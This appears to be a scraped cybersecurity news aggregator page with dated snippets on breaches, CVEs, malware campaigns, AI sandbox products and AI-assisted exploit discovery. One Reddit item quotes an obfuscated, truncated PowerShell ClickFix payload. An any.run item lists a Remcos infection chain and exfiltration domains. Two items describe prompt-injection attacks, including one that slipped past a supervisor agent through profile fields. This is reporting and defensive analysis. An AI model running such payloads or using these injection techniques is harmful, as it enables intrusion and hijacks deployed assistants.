OpenAI revealed a GitHub Actions workflow used to sign its macOS apps led to the download of the malicious Axios library on March 31, but noted that no user data or internal system was compromised. "Out of an abundance of caution, we are taking steps to protect the process that certifies our macOS applications are legitimate OpenAI apps," OpenAI said in a post last week. "We found no
Cybersecurity News and Vulnerability Aggregator
Cybersecurity news aggregator
Updated: 2:40 pm
J/K Navigate / Search S Save V Open Link
— or
treemd <(curl -sL https://allsec.sh/md) (as Markdown) Top Cybersecurity Stories Today
Adobe has released emergency updates to fix a critical security flaw in Acrobat Reader that has come under active exploitation in the wild. The vulnerability, assigned the CVE identifier CVE-2026-34621, carries a CVSS score of 8.6 out of 10.0. Successful exploitation of the flaw could allow an attacker to run malicious code on affected installations. It has been described as
Travel giant says names, contact details, dates, and hotel messages potentially exposed Booking.com is warning customers that their reservation details may have been exposed to unknown attackers, in the latest reminder that the travel giant still can't quite keep a lid on the data flowing through its platform.…
New "Storm" infostealer skips local decryption, sending browser data to attacker servers. Varonis shows how server-side decryption enables session hijacking, bypassing passwords and MFA. [...]
The North Korean hacking group tracked as APT37 (aka ScarCruft) has been attributed to a fresh multi-stage, social engineering campaign in which threat actors approached targets on Facebook and added them as friends on the social media platform, turning the trust-building exercise into a delivery channel for a remote access trojan called RokRAT. "The threat actor used two Facebook
Latest
Monday, April 13
Travel giant says names, contact details, dates, and hotel messages potentially exposed Booking.com is warning customers that their reservation details may have been exposed to unknown attackers, in the latest reminder that the travel giant still can't quite keep a lid on the data flowing through its platform.…
New "Storm" infostealer skips local decryption, sending browser data to attacker servers. Varonis shows how server-side decryption enables session hijacking, bypassing passwords and MFA. [...]
Root cause: the $forbiddenphpstrings blocklist is only enforced in blacklist mode -> the default whitelist mode never touches it. The whitelist regex is also blind to PHP dynamic callable syntax (('exec')('cmd')). Either bug alone limits impact; together they reach OS command execution. Coordinated disclosure - patch available as of 4/4/2026.
A few weeks ago, we announced Dynamic Workers , a new feature of the Workers platform which lets you load Worker code on-the-fly into a secure sandbox. The Dynamic Worker Loader API essentially provides direct access to the basic compute isolation primitive that Workers has been based on all along: isolates, not containers. Isolates are much lighter-weight than containers, and as such, can load 100x faster using 1/10 the memory. They are so efficient, they can be treated as "disposable": start one up to run a few lines of code, then throw it away. Like a secure version of eval(). Dynamic Workers have many uses. In the original announcement, we focused on how to use them to run AI-agent-generated code as an alternative to tool calls. In this use case, an AI agent performs actions at the request of a user by writing a few lines of code and executing them. The code is single-use, intended to perform one task one time, and is thrown away immediately after it executes. But what if you want an AI to generate more persistent code? What if you want your AI to build a small application with a custom UI the user can interact with? What if you want that application to have long-lived state? But of course, you still want it to run in a secure sandbox. One way to do this would be to use Dynamic Workers, and simply provide the Worker with an RPC API that gives it access to storage. Using bindings , you could give the Dynamic Worker an API that points back to your remote SQL database (perhaps backed by Cloudflare D1 , or a Postgres database you access through Hyperdrive — it's up to you). But Workers a
When we launched Cloudflare Sandboxes last June, the premise was simple: AI agents need to develop and run code, and they need to do it somewhere safe. If an agent is acting like a developer, this means cloning repositories, building code in many languages, running development servers, etc. To do these things effectively, they will often need a full computer (and if they don’t, they can reach for something lightweight !). Many developers are stitching together solutions using VMs or existing container solutions, but there are lots of hard problems to solve: Burstiness - With each session needing its own sandbox, you often need to spin up many sandboxes quickly, but you don’t want to pay for idle compute on standby. Quick state restoration - Each session should start quickly and re-start quickly, resuming past state. Security - Agents need to access services securely, but can’t be trusted with credentials. Control - It needs to be simple to programmatically control sandbox lifecycle, execute commands, handle files, and more. Ergonomics - You need to give a simple interface for both humans and agents to do common operations. We’ve spent time solving these issues so you don’t have to. Since our initial launch we’ve made Sandboxes an even better place to run agents at scale. We’ve worked with our initial partners such as Figma, who run agents in containers with Figma Make : “Figma Make is built to help builders and makers of all backgrounds go from idea to production, faster. To deliver on that goal, we needed an infrastructure solution that could provide reli
https://preview.redd.it/hund8ra9iyug1.png?width=453&format=png&auto=webp&s=1888e4b2dc9ff02f687822f9987d3f28bac1177c This keeps coming back after deleting it, i have OneDrive uninstalled but its still appearing like every second after deleting, how to get rid of this?
Monday is back, and the weekend’s backlog of chaos is officially hitting the fan. We are tracking a critical zero-day that has been quietly living in your PDFs for months, plus some aggressive state-sponsored meddling in infrastructure that is finally coming to light. It is one of those mornings where the gap between a quiet shift and a full-blown incident response is basically
As AI Large Language Models and harnesses like OpenCode and Claude Code become increasingly capable, we see more users kicking off sandboxed agents in response to chat messages, Kanban updates, vibe coding UIs, terminal sessions, GitHub comments, and more. The sandbox is an important step beyond simple containers, because it gives you a few things: Security : Any untrusted end user (or a rogue LLM) can run in the sandbox and not compromise the host machine or other sandboxes running alongside it. This is traditionally ( but not always ) accomplished with a microVM. Speed : An end user should be able to pick up a new sandbox quickly and restore the state from a previously used one quickly. Control : The trusted platform needs to be able to take actions within the untrusted domain of the sandbox. This might mean mounting files in the sandbox, or controlling which requests access it, or executing specific commands. Today, we’re excited to add another key component of control to our Sandboxes and all Containers : outbound Workers. These are programmatic egress proxies that allow users running sandboxes to easily connect to different services, add observability , and, importantly for agents, add flexible and safe authentication. How it works Here’s a quick look at adding a secret key to a hea
# First Tahr Blog Post AI pentest agents can generate findings fast. The real value comes from testing which ones are actually exploitable. - SQL injection on parameterized endpoints - XSS behind a strict CSP - SSRF on servers with no outbound access These kinds of findings can look legitimate in raw output. EVA re-tests each one independently. If it cannot reproduce the issue, the finding is removed from the report. The end result is a report built on verified issues and real evidence.
Anthropic restricted its Mythos Preview model last week after it autonomously found and exploited zero-day vulnerabilities in every major operating system and browser. Palo Alto Networks' Wendi Whitmorewarned that similar capabilities are weeks or months from proliferation. CrowdStrike's 2026 Global Threat Report puts average eCrime breakout time at 29 minutes. Mandiant's M-Trends 2026
Names, addresses, dates of birth, and bank details accessed, though not passwords Basic-Fit, Europe's largest gym chain, has confirmed data including the bank details of around a million customers was stolen from its systems.…
Did not build these, but tried out a few. I'd say they have varying quality but definitely a good starting point when building your own ai skill arsenal.
Gang claims it accessed Snowflake metrics via third-party tool ShinyHunters is back, this time pinning Rockstar Games to its leak site and claiming it didn't so much hack its way in as walk through a door someone else left wide open.…
Last April, a hacker hijacked crosswalk announcements to mimic Mark Zuckerberg and Elon Musk. Records obtained by WIRED reveal how unprepared local authorities were.
Benchmarking contract lays groundwork for renegotiating £774M software agreement NHS England is spending £46,000 on "benchmarking" as it gears up for what looks like the next round of negotiations behind one of the UK public sector's biggest software deals.…
The North Korean hacking group tracked as APT37 (aka ScarCruft) has been attributed to a fresh multi-stage, social engineering campaign in which threat actors approached targets on Facebook and added them as friends on the social media platform, turning the trust-building exercise into a delivery channel for a remote access trojan called RokRAT. "The threat actor used two Facebook
Last week, a new BYOVD vulnerability (CVE-2026-29923) was discovered in pstrip64.sys driver, which allows an unprivileged user to escalate privileges to SYSTEM via a crafted IOCTL request. I just published a complete deep-dive on my GitHub covering the entire exploit lifecycle: ▪️Reverse-engineering the vulnerable IOCTL to gain a physical read/write primitive. ▪️ Building the Proof of Concept (PoC) from the ground up. ▪️ Actionable mitigation and detection recommendations for defenders. Enjoy the read, and feel free to DM me if you have any questions! ⚠️ Disclaimer: This write-up and code are provided strictly for educational and defensive research purposes only. Any malicious or unauthorized use is strictly prohibited.
To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the [Reverse Engineering StackExchange](http://reverseengineering.stackexchange.com/). See also /r/AskReverseEngineering.
OpenAI revealed a GitHub Actions workflow used to sign its macOS apps led to the download of the malicious Axios library on March 31, but noted that no user data or internal system was compromised. "Out of an abundance of caution, we are taking steps to protect the process that certifies our macOS applications are legitimate OpenAI apps," OpenAI said in a post last week. "We found no
I found the following script tag in the Questrade login page's (https://login.questrade.com/account/login) source code. `<script src="https://echo.sterope.site/Nb4zs5eWdNG34JbjnxGV.js" nonce=""></script>` I only found this because my Rogers Xfinity Advanced Security blocked this link and sent me a notification. Does anyone else see this in their browser's source code? Is this normal for this external javascript link to be embedded on the login page?
PLUS: Toyota wheels out basketball bot; Arm scores AI server win with SK Telecom; India ponders payment pauses to foil fraudsters; And more! Asia In Brief China’s National Data Administration last Friday published its action plan for AI in education which calls for upskilling of the nation’s citizens to ensure they can put the technology to work.…
In my last post, we looked at the emergence of Anthropic’s Mythos and how it has collapsed the exploit timeline from weeks to days. But once you accept that the speed of the adversary has changed, a more difficult question remains for security leaders: What do we actually do now? The shift signaled by Project […] The post Become Mythos-Ready and Close the AI Coverage Gap with Synack appeared first on Synack .
Sunday, April 12
Or it's a bunch of pre-IPO hype. Either way, we're giving it the once-over on this week's episode Kettle Anthropic dropped a doozy on us this week with the launch of Mythos, an AI model it says is able to find and exploit zero-day vulnerabilities with a shocking level of ability. …
it appears [thermaltake.com](http://thermaltake.com) has been hacked (thermaltakeusa.com is fine). After a brief moment on the site, a fake CAPCHA loads and then asks the user to paste into a command prompt. The payload is obfuscated powershell, which I'm obviously not going to post in its entirety: <# Verification code: 66173BB5F5E9 #> $w23='bMNMcS';$x24='463b2026506011706916302a11392b204d1d0739601 \[..\] 7e106807352739';$y25='';for($z26=0;$z26 -lt $x24.Length;$z26+=2){$y25+=\[char\]((\[convert\]::ToInt32($x24.Substring($z26,2),16))-bxor\[int\]\[char\]$w23\[$z26/2%$w23.Length\])};.($env:ComSpec\[4,26,25\]-join'') $y25 I tested this on 2 PCs at home with Chrome, Brave, and Firefox. It did not happen on my phone, so I assume it's just for Windows. I sent Thermaltake an email about this. Can anyone verify?
Cloudflare's mission has always been to help build a better Internet. Sometimes that means building for the Internet as it exists. Sometimes it means building for the Internet as it's about to become. Today, we're kicking off Agents Week, dedicated to building the Internet for what comes next. The Internet wasn't built for the age of AI. Neither was the cloud. The cloud, as we know it, was a product of the last major technological paradigm shift: smartphones. When smartphones put the Internet in everyone's pocket, they didn't just add users — they changed the nature of what it meant to be online. Always connected, always expecting an instant response. Applications had to handle an order of magnitude more users, and the infrastructure powering them had to evolve. The approach the industry converged on was straightforward: more users, more copies of your application. As applications grew in complexity, teams broke them into smaller pieces — microservices — so each team could control its own destiny. But the core principle stayed the same: a finite number of applications, each serving many users. Scale meant more copies. Kubernetes and containers became the default. They made it easy to spin up instances, load balance, and tear down what you didn't need. Under this one-to-many model, a single instance could serve many users, and even as user counts grew into the billions, the number of things you had to manage stayed finite. Agents break this. One user, one agent, one task Unlike every application that came before them, agents are one-to-one. Each agent is a unique instance. Serving one user, running one task. Where a traditional application follows the same execution path reg
A critical pre-authentication remote code execution (RCE) vulnerability in Marimo is now under active exploitation, leveraged for credential theft. [...]
drakoarmy/akamai-vm-reverse: Decompiled and cleaned Akamai v3 VM powering the latest sensor_data challenge script.
Unknown threat actors compromised CPUID ("cpuid[.]com"), a website that hosts popular hardware monitoring tools like CPU-Z, HWMonitor, HWMonitor Pro, and PerfMonitor, for less than 24 hours to serve malicious executables for the software and deploy a remote access trojan called STX RAT. The incident lasted from approximately April 9, 15:00 UTC, to about April 10, 10:00 UTC, with
Adobe has released emergency updates to fix a critical security flaw in Acrobat Reader that has come under active exploitation in the wild. The vulnerability, assigned the CVE identifier CVE-2026-34621, carries a CVSS score of 8.6 out of 10.0. Successful exploitation of the flaw could allow an attacker to run malicious code on affected installations. It has been described as
Saturday, April 11
An international law enforcement action led by the U.K.'s National Crime Agency (NCA) has identified over 20,000 victims of cryptocurrency fraud across Canada, the United Kingdom, and the United States. [...]
Plus: Iran’s internet blackout hits the 1,000-hour mark, cryptocurrency scams result in a record amount of money stolen from Americans, and more.
From AI-generated images to restricted satellite data, the systems used to verify what’s real online are struggling to keep up.
Nearly 800 state logins surfaced in breach data, including defense and NATO-linked accounts Hungary's government has discovered the hard way that the biggest threat to national security might just be its own password choices.…
Hungarian domestic intelligence, the national police in El Salvador, and several U.S. law enforcement and police departments have been attributed to the use of an advertising-based global geolocation surveillance system called Webloc. The tool was developed by Israeli company Cobwebs Technologies and is now sold by its successor Penlink after the two firms merged in July 2023
OpenAI has rolled out a new Pro subscription that costs $100 and is in line with Claude's pricing, which also has a $100 subscription, in addition to the $200 Max monthly plan. [...]
Friday, April 10
The Kill Chain models how an attack succeeds. The Attack Helix models how the offensive baseline improves. The Tipping Point One person. Two AI subscriptions. Ten government agencies. 150 gigabytes of sovereign data. In December of 2025, a single unidentified operator used Anthropic’s Clau
The Blind Spot As organizations race to deploy LLM-powered chat agents, many have adopted a layered defense model: a primary chat agent handles user interactions while a secondary supervisor agent monitors contextual input (i.e., chat messages) for prompt injection attacks and policy violations. This architecture mirrors traditional security patterns like web application firewalls sitting in front of application servers. But what happens when the supervisor only watches the front door? Indirect prompt injection is a class of attack where adversarial instructions are embedded not in the user’s direct input, but in external data sources that an LLM consumes as context: profile fields, retrieved documents, tool outputs, or database records. Unlike direct prompt injection, where a user explicitly sends malicious instructions through the chat interface, indirect injection hides the payload in data that the application fetches on the user’s behalf—often from sources the system implicitly trusts. During a recent engagement targeting a multi-model AI-integrated customer service solution, our team identified a weakness in the architecture that made it susceptible to indirect prompt injection attacks. The customer service solution consisted of an AI-enabled chat agent that processed user requests and a separate supervisor agent that monitored the chat communications for adversarial instructions and manipulation, including prompts injected into data provided to the agent via the chat window. The supervisor agent was effective in consistently detecting and blocking attempts to attack or manipulate the chat agent. However, by injecting adversarial instructions into user profile fields—such as a user’s name—that the chat agent would retrieve upon request, we were able to bypass supervisor protections and trick the chat agent into misinterpreting our user’s profile data as a prompt and executing our hidden instructions. The root cause is a fundamen
Cloudflare’s global network and backbone in 2026. Cloudflare's network recently passed a major milestone: we crossed 500 terabits per second (Tbps) of external capacity. When we say 500 Tbps, we mean total provisioned external interconnection capacity: the sum of every port facing a transit provider, private peering partner, Internet exchange, or Cloudflare Network Interconnect (CNI) port across all 330+ cities. This is not peak traffic. On any given day, our peak utilization is a fraction of that number. (The rest is our DDoS budget.) It’s a long way from where we started. In 2010, we launched from a small office above a nail salon in Palo Alto, with a single transit provider and a reverse proxy you could set up by changing two nameservers . The early days of transit and peering Our first transit provider was nLayer Communications, a network most people now know as GTT. nLayer gave us our first capacity and our first hands-on company experience in peering relationships and the careful balance between cost and performance. From there, we grew city by city : Chicago, Ashburn, San Jose, Amsterdam, Tokyo. Each new data center meant negotiating colocation contracts, pulling fiber, racking servers, and establishing peering through Internet exchanges . The Internet isn't actually a cloud, of course. It is a collection of specific rooms full
I got tired of juggling 10 different tools for DFIR, so I spent the last 9 months building an open-source alternative.
Hey everyone, I don't know about you, but I was getting seriously frustrated with how fragmented our tools are. Trying to piece together an investigation across Windows, Linux, and Mac artifacts usually means jumping between half a dozen different apps, and the centralized "all-in-one" solutions cost some money So, about 9 months ago, I decided to just try and build the tool I actually wanted to use. It's called **Heimdall DFIR**. **GitHub:** [https://raiseix.github.io/Heimdall-DFIR](https://raiseix.github.io/Heimdall-DFIR) Instead of a bunch of marketing buzzwords, here is what it actually does right now: * **One giant timeline:** It takes your artifacts (EVTX, MFT, Prefetch and other Windows artifacts Linux/Mac logs, etc.) and merges them into a single chronological grid. I spent a lot of time trying to make the output actually human-readable instead of just dumping raw JSON on the screen * **RAM Analysis:** I hooked it up to VolWeb (Volatility 3). You can upload massive memory dumps directly in the UI and it actually handles the stream without crashing the backend * **Collaborative mode:** Investigating alone sucks, so I added a side-chat and an evidence-pinning system so a team can look at the exact same case simultaneously **To be completely transparent with you all:** This is very much a Beta. It’s a massive undertaking and it’s still missing a lot of features I want to add before calling it a complete platform That’s honestly why I’m sharing it today. I’m hoping to get some brutally honest feedback from people who do this daily. What parsers are you constantly missing in open-source tools? What would make you actually want to use this? If anyone wants to spin it up (Docker compose is ready to go), break it, submit bug reports, or even contribute code to help build this out, I would be incredibly grateful. Let me know what you think. If you like the vision, a GitHub ⭐ helps a lot!
Posted by Jiacheng Lu, Software Engineer, Google Pixel Team Google is continuously advancing the security of Pixel devices. We have been focusing on hardening the cellular baseband modem against exploitation. Recognizing the risks associated within the complex modem firmware, Pixel 9 shipped with mitigations against a range of memory-safety vulnerabilities. For Pixel 10, Google is advancing its proactive security measures further. Following our previous discussion on "Deploying Rust in Existing Firmware Codebases" , this post shares a concrete application: integrating a memory-safe Rust DNS(Domain Name System) parser into the modem firmware. The new Rust-based DNS parser significantly reduces our security risk by mitigating an entire class of vulnerabilities in a risky area, while also laying the foundation for broader adoption of memory-safe code in other areas. Here we share our experience of working on it, and hope it can inspire the use of more memory safe languages in low-level environments. Why Modem Memory Safety Can’t Wait In recent years, we have seen increasing interest in the cellular modem from attackers and security researchers. For example, Google's Project Zero gained remote code execution on Pixel modems over the Internet. Pixel modem has tens of Megabytes of executable code. Given the complexity and remote attack surface of the modem, other critical memory safety vulnerabilities may remain in t
Analysis of 1 billion CISA KEV remediation records reveal a breaking point for human-scale security. Qualys shows most critical flaws are exploited before defenders can patch them. [...]
Cybersecurity researchers have flagged yet another evolution of the ongoing GlassWorm campaign, which employs a new Zig dropper that's designed to stealthily infect all integrated development environments (IDEs) on a developer's machine. The technique has been discovered in an Open VSX extension named "specstudio.code-wakatime-activity-tracker," which masquerades as WakaTime, a
A financially motivated threat actor tracked as Storm-2755 is stealing Canadian employees' salary payments after hijacking their accounts in payroll pirate attacks. [...]
Keyloggers: A Persistent Threat Nowadays, virtually all digital services rely on logins and authentication, from email inboxes to help desks. These involve login credentials to prove identity, typically at least a username and a password. Initially, this information is confidential from a potential attacker. Whi
Just what FOSS developers need – a flood of AI-discovered vulnerabilities Opinion Anthropic describes Project Glasswing as a coalition of tech giants committing $100 million in AI resources to hunt down and fix long-hidden vulnerabilities in critical open source software that it's finding with its new Mythos AI program. Or as The Reg put it , "an AI model that can generate zero-day vulnerabilities."…
Four-week call for evidence intended to help shape laws aimed at devices linked to crime The UK government is seeking views on radiofrequency jammers as it prepares legislation to ban the controversial devices.…
While much of the discussion on AI security centers around protecting ‘shadow’ AI and GenAI consumption, there's a wide-open window nobody's guarding: AI browser extensions. A new report from LayerX exposes just how deep this blind spot goes, and why AI extensions may be the most dangerous AI threat surface in your network that isn't on anyone's
Google says Gmail end-to-end encryption (E2EE) is now available on all Android and iOS devices, allowing enterprise users to read and compose emails without additional tools. [...]
Cut through the noise and understand the real risks, responsibilities, and responses shaping enterprise AI today. Webinar Promo 2025 was the year of AI experimentation. In 2026, the bills are coming due. AI adoption has moved from isolated pilots to autonomous, enterprise wide deployment, bringing with it a sophisticated new generation of security challenges.…
Google has made Device Bound Session Credentials (DBSC) generally available to all Windows users of its Chrome web browser, months after it began testing the security feature in open beta. The public availability is currently limited to Windows users on Chrome 146, with macOS expansion planned in an upcoming Chrome release. "This project represents a significant
Unknown threat actors have hijacked the update system for the Smart Slider 3 Pro plugin for WordPress and Joomla to push a poisoned version containing a backdoor. The incident impacts Smart Slider 3 Pro version 3.5.1.35 for WordPress, per WordPress security company Patchstack. Smart Slider 3 is a popular WordPress slider plugin with more than 800,000 active installations across its free and Pro
GreyNoise uncovers a concentrated RDP scanning campaign, revealing infrastructure patterns, rapid traffic shifts that impact detection, and recommendations for defenders.
Thursday, April 9
A new Lua-based malware, called LucidRook, is being used in spear-phishing campaigns targeting non-governmental organizations and universities in Taiwan. [...]
Threat actors using a previously undocumented phishing-as-a-service (PhaaS) platform called "VENOM" are targeting credentials of C-suite executives across multiple industries. [...]
Dutch healthcare software vendor ChipSoft has been impacted by a ransomware attack that forced the company to take offline its website and digital services for patients and healthcare providers. [...]
Cops bust latest scam, return $12m to bilked victims US, UK, and Canadian law enforcement Thursday said that they disrupted a $45 million global cryptocurrency scam, freezing $12 million in stolen funds and identifying more than 20,000 cryptocurrency wallet addresses linked to fraud victims across 30 countries.…
Anthropic’s Mythos announcement marks a genuine inflection point in the threat landscape. And for those of us who have spent careers watching it evolve, this one feels different. Building a reliable working exploit used to take a skilled attacker the better part of a year. With AI-powered offensive tooling, we’re looking at potentially days. That […] The post Mythos Changes Everything: Why Your Entire Attack Surface Is Now at Risk appeared first on Synack .
Details have emerged about a now-patched security vulnerability in a widely used third-party Android software development kit (SDK) called EngageLab SDK that could have put millions of cryptocurrency wallet users at risk. "This flaw allows apps on the same device to bypass Android security sandbox and gain unauthorized access to private data," the Microsoft Defender
Possible link to Mr. Raccoon's claimed Adobe break-in A new extortion crew has targeted “several dozen high-value” corporations through phishing and helpdesk social-engineering, according to Google.…
Posted by Ben Ackerman, Chrome team, Daniel Rubery, Chrome team and Guillaume Ehinger, Google Account Security team Following our April 2024 announcement , Device Bound Session Credentials (DBSC) is now entering public availability for Windows users on Chrome 146, and expanding to macOS in an upcoming Chrome release. This project represents a significant step forward in our ongoing efforts to combat session theft, which remains a prevalent threat in the modern security landscape. Session theft typically occurs when a user inadvertently downloads malware onto their device. Once active, the malware can silently extract existing session cookies from the browser or wait for the user to log in to new accounts, before exfiltrating these tokens to an attacker-controlled server. Infostealer malware families, such as LummaC2, have become increasingly sophisticated at harvesting these credentials. Because cookies often have extended lifetimes, attackers can use them to gain unauthorized access to a user’s accounts without ever needing their passwords; this access is then often bundled, traded, or sold among threat actors. Crucially, once sophisticated malware has gained access to a machine, it can read the local files and memory where browsers store authentication cookies. As a result, there is no reliable way to prevent cookie exfiltration using software alone on any operating system. Historically, mitigating session theft relied on detecting the stolen credentials after the fact using a complex set of abuse heuristics – a reactive approach that persistent attackers could often circumvent. DBSC fundamentally changes the web's capability to defend against this threat by shifting the paradigm from reactive detection to proactive prevention, ensuring that successfully exfiltrated c
A previously undocumented threat cluster dubbed UAT-10362 has been attributed to spear-phishing campaigns targeting Taiwanese non-governmental organizations (NGOs) and suspected universities to deploy a new Lua-based malware called LucidRook. "LucidRook is a sophisticated stager that embeds a Lua interpreter and Rust-compiled libraries within a dynamic-link library (DLL) to download and
UK and US customers stuck waiting after fleet management SaaS vendor took affected environments offline A cybersecurity incident has knocked FleetWave into a "major outage" across the UK and US after Chevin Fleet Solutions pulled parts of its SaaS platform offline and left customers scrambling for answers.…
Overview Multiple vulnerabilities have been identified in Orthanc DICOM Server version, 1.12.10 and earlier, that affect image decoding and HTTP request handling components. These vulnerabilities include heap buffer overflows, out-of-bounds reads, and resource exhaustion vulnerabilities that may allow attackers to crash the server, leak memory contents, or potentially execute arbitrary code. Description Orthanc is an open-source lightweight Digital Imaging and Communications in Medicine (DICOM) server used to store, process, and retrieve medical imaging data in healthcare environments. The following nine vulnerabilities identified in Orthanc primarily stem from unsafe arithmetic operations, missing bounds checks, and insufficient validation of attacker-controlled metadata in DICOM files and HTTP requests. CVE-2026-5437 An out-of-bounds read vulnerability exists in DicomStreamReader during DICOM meta-header parsing. When processing malformed metadata structures, the parser may read beyond the bounds of the allocated metadata buffer. Although this issue does not typically crash the server or expose data directly to the attacker, it reflects insufficient input validation in the parsing logic. CVE-2026-5438 A gzip decompression bomb vulnerability exists when Orthanc processes an HTTP request with Content-Encoding: gzip . The server does not enforce limits on decompressed size and allocates memory based on attacker-controlled compression metadata. A specially crafted gzip payload can trigger excessive memory allocation and exhaust system memory. CVE-2026-5439 A memory exhaustion vulnerability exists in ZIP archive processing. Orthanc automatically extracts ZIP archives uploaded t
Stolen credentials turn authentication systems into the attack surface. Token shows how wearable biometric authentication verifies the user—not the session—blocking phishing relays and MFA bypass. [...]
No emails, no warnings, no humans – just bots, catch-22s, and a 60-day appeals queue Microsoft says that it will work on how it communicates with developers after two leading open source figures were suddenly locked out of their accounts, leaving them unable to sign updates.…
Security researchers tricked Apple Intelligence into cursing at users. It could have been a lot worse
Wash your mouth out with digital soap Apple Intelligence, the personal AI system integrated into newer Macs, iPhones, and other iThings, can be hijacked using prompt injection, forcing the model into producing an attacker-controlled result and putting millions of users at risk, researchers have shown.…
Thursday. Another week, another batch of things that probably should've been caught sooner but weren't. This one's got some range — old vulnerabilities getting new life, a few "why was that even possible" moments, attackers leaning on platforms and tools you'd normally trust without thinking twice. Quiet escalations more than loud zero-days, but the kind that matter more in
Attackers slipped into the process and redirected funds, leaving the company scrambling to recover the cash UK-listed oil and gas outfit Zephyr Energy plc has admitted a cyber incident siphoned off roughly £700,000 after a single payment to a contractor was quietly redirected to an attacker-controlled account.…
As AI tools become more accessible, employees are adopting them without formal approval from IT and security teams. While these tools may boost productivity, automate tasks, or fill gaps in existing workflows, they also operate outside the visibility of security teams, bypassing controls and creating new blind spots in what is known as shadow AI. While similar to the phenomenon of
We added a new chapter to our Testing Handbook: a comprehensive security checklist for C and C++ code . We’ve identified a broad range of common bug classes, known footguns, and API gotchas across C and C++ codebases and organized them into sections covering Linux, Windows, and seccomp. Whereas other handbook chapters focus on static and dynamic analysis, this chapter offers a strong basis for manual code review. LLM enthusiasts rejoice: we’re also developing a Claude skill based on this new chapter. It will turn the checklist into bug-finding prompts that an LLM can run against a codebase, and it’ll be platform and threat-model aware. Be sure to give it a try when we release it. And after reading the chapter, you can test your C/C++ review skills against two challenges at the end of this post. Be in the first 10 to submit correct answers to win Trail of Bits swag! What’s in the chapter The chapter covers five areas: general bug classes, Linux usermode and kernel, Windows usermode and kernel, and seccomp/BPF sandboxes. It starts with language-level issues in the bug classes section—memory safety, integer errors, type confusion, compiler-introduced bugs—and gets progressively more environment-specific. The Linux usermode section focuses on libc gotchas. This section is also applicable to most POSIX systems. It ranges from well-known problems with string methods, to somewhat less known caveats around privilege dropping and environment variable handling. The Linux kernel is a complicated beast, and no checklist could cover even a part of its intricacies. However, our new Testing Handbook chapter can give you a starting point to bootstrap manual reviews of drivers and modules.
An apparent hack-for-hire campaign likely orchestrated by a threat actor with suspected ties to the Indian government targeted journalists, activists, and government officials across the Middle East and North Africa (MENA), according to findings from Access Now, Lookout, and SMEX. Two of the targets included prominent Egyptian journalists and government critics, Mostafa
Political candidates are purchasing more home alarms, bulletproof vests, and other protections amid rising fears of political violence.
Even fitness equipment is vulnerable to mischief makers these days PWNED Welcome back to Pwned, the column where we share war stories from IT soldiers who shot themselves – or watched someone else shoot themselves – in the foot. Today's tale shows that even when you're setting up something as simple as fitness gear, there's no excuse for leaving security credentials lying around.…
A look at how Kubernetes CVE-2020-8562 allows attackers to bypass API server proxy protections using DNS rebinding
Public blockchains solved settlement. They didn't solve privacy. Institutions need to protect positions, counterparty relationships, and transaction amounts without abandoning transparency entirely - and every architecture that tried to solve this hit the same wall. Protocol-level privacy locks everything. Permissioned chains recreate centralization. Separate privacy layers fragment liquidity. Stellar's answer is different. Cryptographic primitives baked into the base layer, two production-ready privacy models on top, and the institution decides what to reveal and to whom. Transparent when you want it. Private when you need it.
Wednesday, April 8
Any\[.\]run identified a multi-stage phishing campaign using a Google Drive-themed lure and delivering Remcos RAT. Attackers place the HTML on storage\[.\]googleapis\[.\]com, abusing trusted infrastructure instead of hosting the phishing page on a newly registered domain. The chain leverages RegSvcs.exe, a legitimate signed Microsoft/.NET binary with a clean VirusTotal hash. Combined with trusted hosting, this makes reputation-based detection unreliable and lowers alert priority during triage. File reputation alone is not enough. Detection depends on behavioral analysis and sandboxing. The page mimics a Google Drive login form, collecting email, password, and OTP. After a “successful login,” the victim is prompted to download Bid-Packet-INV-Document.js, triggering a multi-stage delivery chain: S (WSH launcher + time-based evasion) -> VBS Stage 1 (download + hidden execution) -> VBS Stage 2 (%APPDATA%\\WindowsUpdate + Startup persistence) -> DYHVQ.ps1 (loader orchestration) -> ZIFDG.tmp (obfuscated PE / Remcos payload) -> Textbin-hosted obfuscated .NET loader (in-memory via Assembly.Load) -> %TEMP%\\RegSvcs.exe hollowing/injection -> Partially fileless Remcos + C2 Analysis session: [https://app.any.run/tasks/0efd1390-c17a-49ce-baef-44b5bd9c4a97](https://app.any.run/tasks/0efd1390-c17a-49ce-baef-44b5bd9c4a97/?utm_source=reddit) TI Lookup query: [domainName:www.freepnglogos.com and domainName:storage.googleapis.com and threatLevel:malicious](https://intelligence.any.run/analysis/lookup?utm_source=reddit#%7B%22query%22:%22domainName:%5C%22www.freepnglogos.com%5C%22%20and%20domainName:%5C%22storage.googleapis.com%5C%22%20and%20threatLevel:%5C%22malicious%5C%22%22,%22dateRange%22:30%7D) IOCs Phishing URLs: hxxps://storage\[.\]googleapis\[.\]com/pa-bids/GoogleDrive.html hxxps://storage\[.\]googleapis\[.\]com/com-bid/GoogleDrive.html hxxps://storage\[.\]googleapis\[.\]com/contract-bid-0/GoogleDrive.html hxxps://storage\[.\]googleapis\[.\]com/in-bids/GoogleDrive.html hxxp://storage\[.\]googleapis\[.\]com/out-bid/GoogleDrive.html Credential exfiltration domains: usmetalpowders\[.\]co iseeyousmile9\[.\]com Credential exfiltration path: /1a/uh.php Malware staging host: brianburkeauction\[.\]com Source: r/ANYRUN
In Lebanon, nearly 1 in 5 people has been displaced by Israeli attacks, leaving the government to manage a modern crisis without modern digital infrastructure.
Cybersecurity researchers have flagged a new variant ofmalware called Chaosthat'scapable of hitting misconfigured cloud deployments, marking an expansion of the botnet's targeting infrastructure. "Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices," Darktrace said in a new report.
Atomic Stealer (AMOS) macOS Malware Decryption, Anti-VM, Hardware Wallet Trojanization & Persistent Backdoor
